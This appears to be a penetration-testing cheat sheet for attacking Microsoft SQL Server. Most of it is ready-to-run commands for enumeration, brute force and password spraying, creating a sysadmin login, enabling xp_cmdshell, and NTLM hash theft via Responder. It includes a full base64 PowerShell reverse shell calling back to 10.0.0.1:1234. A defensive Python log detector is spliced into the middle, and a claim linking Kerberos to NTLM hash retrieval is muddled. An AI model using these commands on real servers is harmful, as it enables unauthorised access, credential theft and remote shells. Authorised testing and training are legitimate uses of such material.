# MSSQL (Microsoft SQL) Pentesting

#### MSSQL is a relational database management system. The default port is 1433.

### Enumeration <a href="#enumeration" id="enumeration"></a>

```shellscript
nmap --script ms-sql-info -p 1433 <target-ip>
nmap --script ms-sql-config -p 1433 <target-ip>
nmap --script ms-sql-empty-password,ms-sql-xp-cmdshell -p 1433 <target-ip>
nmap --script ms-sql-* -p 1433 <target-ip>

# MSDAT: https://github.com/quentinhardy/msdat
# all: Enumerate with all modules
python3 msdat.py all -s example.com
# -D, -U, -P: Use Windows authentication
python3 msdat.py all -s example.com -D domain -U username -P password
# xpdirectory: List directories in system
python3 msdat.py xpdirectory -s manager.htb -D manager -U operator -P operator -d master --list-files 'C:\'
# bulkopen: Read/download files
python3 msdat.py bulkopen -s example.com -D domain -U username -P password -d database --read-file 'C:\Users\Administrator\Desktop\example.txt'

# Metasploit
msfconsole
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
```

#### Brute Force Credentials <a href="#brute-force-credentials" id="brute-force-credentials"></a>

```shellscript
netexec mssql <target-ip> -u username -p passwords.txt

hydra -L usernames.txt -p password <target-ip> mssql
hydra -l username -P passwords.txt <target-ip> mssql
```

### Password Spraying Attack <a href="#password-spraying-attack" id="password-spraying-attack"></a>

If we have found a specific user's password, we may be able to find other users who share the same password.

```shellscript
netexec mssql example.com -u usernames.txt -p 'password' --no-bruteforce --continue-on-success
```

### Connect <a href="#connect" id="connect"></a>

```shellscript
# impacket
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip>
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip> -windows-auth

# sqsh
sqsh -S <target-ip> -U username -P password
sqsh -S <target-ip> -U username -P password -D database
```

### Commands <a href="#commands" id="commands"></a>

```shellscript
# Get the version of MSSQL
> SELECT @@version

# Get current username
> SELECT user_name()

# Get all users
> SELECT * FROM sys.database_principals

# Get databases
> SELECT * FROM master.dbo.sysdatabases

# Switch to the database
> USE <database>

# List tables
> SELECT * FROM information_schema.tables

# Get table content
> SELECT * FROM <database_name>.dbo.<table_name>


# Check if the current user has permission to execute OS commands
> USE master
> EXEC sp_helprotect 'xp_cmdshell'

# Get linked servers
> EXEC sp_linkedservers
> SELECT * FROM sys.servers

# Create a new user with sysadmin privilege
> CREATE LOGIN tester WITH PASSWORD = 'password'
> EXEC sp_addsrvrolemember 'tester', 'sysadmin'

# List directories
> xp_dirtree '.\'
> xp_dirtree 'C:\inetpub\'
> xp_dirtree 'C:\inetpub\wwwroot\'
> xp_dirtree 'C:\Users\'
```

#### Impersonate Other Users <a href="#impersonate-other-users" id="impersonate-other-users"></a>

Reference: [HackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server#impersonation-of-other-users)

```shellscript
# Assume that the 'sa' login can be impersonated by the current login.
EXECUTE AS LOGIN = 'sa'
EXEC xp_cmdshell 'whoami'
```

### Spawn a Windows Command Shell and Run Commands using Impacket <a href="#spawn-a-windows-command-shell-and-run-commands-using-impacket" id="spawn-a-windows-command-shell-and-run-commands-using-impacket"></a>

In the Impacket MSSQL client, we can execute Windows shell commands via `enable_xp_cmdshell` if the user has the required permission.

#### Enable/Disable a Windows Shell <a href="#enabledisable-a-windows-shell" id="enabledisable-a-windows-shell"></a>

```shellscript
> enable_xp_cmdshell

# or

# Enable advanced options
> EXEC sp_configure 'show advanced options', 1;
# Update the currently configured value for the advanced options
> RECONFIGURE;

# Enable the command shell
> EXEC sp_configure 'xp_cmdshell', 1;
# Update the currently configured value for the command shell
> RECONFIGURE;
```
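Added example (not from the original page or any tool it cites): a small Python detector that reads SQL Server ERRORLOG lines and flags both the password spraying described earlier (one client address failing logins for many distinct users) and the `xp_cmdshell` enablement shown above (the "Configuration option 'xp_cmdshell' changed from 0 to 1" message written when `sp_configure` is run). The sample log lines are constructed and their format is an assumption modelled on SQL Server's own messages.

```python
import re
from collections import defaultdict

# Constructed sample ERRORLOG lines (assumption: format mirrors SQL Server's
# "Login failed" and "Configuration option ... changed" messages).
SAMPLE_ERRORLOG = """\
2024-01-15 10:23:45.12 Logon       Login failed for user 'alice'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-01-15 10:23:45.40 Logon       Login failed for user 'bob'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-01-15 10:23:45.71 Logon       Login failed for user 'carol'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-01-15 10:23:46.02 Logon       Login failed for user 'dave'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-01-15 10:24:10.00 Logon       Login failed for user 'alice'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.9]
2024-01-15 10:30:01.00 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-01-15 10:30:02.00 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

LOGIN_FAILED = re.compile(
    r"^(?P<ts>\S+ \S+) Logon\s+Login failed for user '(?P<user>[^']+)'.*\[CLIENT: (?P<client>[^\]]+)\]"
)
CONFIG_CHANGED = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<spid>spid\d+)\s+Configuration option '(?P<option>[^']+)' "
    r"changed from (?P<old>\d+) to (?P<new>\d+)"
)

# sp_configure options whose 0 -> 1 transition should raise an alert.
WATCHED_OPTIONS = {"xp_cmdshell"}


def detect_spraying(log_text, min_distinct_users=3):
    """Return {client_ip: sorted user list} for clients whose failed logins
    span at least min_distinct_users different accounts (spraying pattern)."""
    users_by_client = defaultdict(set)
    for line in log_text.splitlines():
        m = LOGIN_FAILED.match(line)
        if m:
            users_by_client[m["client"]].add(m["user"])
    return {ip: sorted(u) for ip, u in users_by_client.items() if len(u) >= min_distinct_users}


def detect_dangerous_config(log_text):
    """Return (timestamp, spid, option) tuples for watched options switched from 0 to 1."""
    hits = []
    for line in log_text.splitlines():
        m = CONFIG_CHANGED.match(line)
        if m and m["option"] in WATCHED_OPTIONS and m["old"] == "0" and m["new"] == "1":
            hits.append((m["ts"], m["spid"], m["option"]))
    return hits


if __name__ == "__main__":
    print("spraying:", detect_spraying(SAMPLE_ERRORLOG))
    print("config:", detect_dangerous_config(SAMPLE_ERRORLOG))
```

The `spid` in a config hit can be joined against `sys.dm_exec_sessions` on a live server to see which login made the change.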

#### Commands <a href="#commands_1" id="commands_1"></a>

We can execute commands just as in the Windows Command Prompt.

```shellscript
> xp_cmdshell whoami

# Execute encoded PowerShell commands.
> xp_cmdshell 'powershell -e <BASE64_PAYLOAD>'

# Reverse Shell
# Note: Replace the Base64 encoded payload with your own. See details: https://exploit-notes.hdks.org/exploit/shell/reverse-shell-cheat-sheet/#powershell
> xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMAAuADAALgAxACcALAAxADIAMwA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAnAFAAUwAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
```

### Privilege Escalation <a href="#privilege-escalation" id="privilege-escalation"></a>

```shellscript
msfconsole
msf> use exploit/windows/mssql/mssql_linkcrawler
```

### Get NTLM Hash <a href="#get-ntlm-hash" id="get-ntlm-hash"></a>

MSSQL uses **Kerberos** to authenticate users, so we can retrieve the NTLM hash.

#### 1. Start SMB Server and Responder <a href="#id-1-start-smb-server-and-responder" id="id-1-start-smb-server-and-responder"></a>

First we need to start an SMB server and Responder, each in its own terminal.

```shellscript
# In terminal 1
sudo responder -I <interface>

# In terminal 2
sudo impacket-smbserver share ./ -smb2support

# In terminal 3
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
```

#### 2. Execute with Metasploit <a href="#id-2-execute-with-metasploit" id="id-2-execute-with-metasploit"></a>

In msfconsole, select the following module.\
We need to set the `SMBPROXY` option to the Responder IP (this IP is displayed when Responder starts in its terminal).

```shellscript
msfconsole
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
msf> set rhosts <target_ip>
msf> set username <username>
msf> set password <password>
# If we use Windows credential, set as below:
msf> set use_windows_authent true
msf> set smbproxy <responder_ip>
msf> run
```

When the module runs, the NTLM hash appears in the terminal where the SMB server is running.

### References <a href="#references" id="references"></a>

* [HackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server)
* [Microsoft Learn](https://learn.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-ver16)
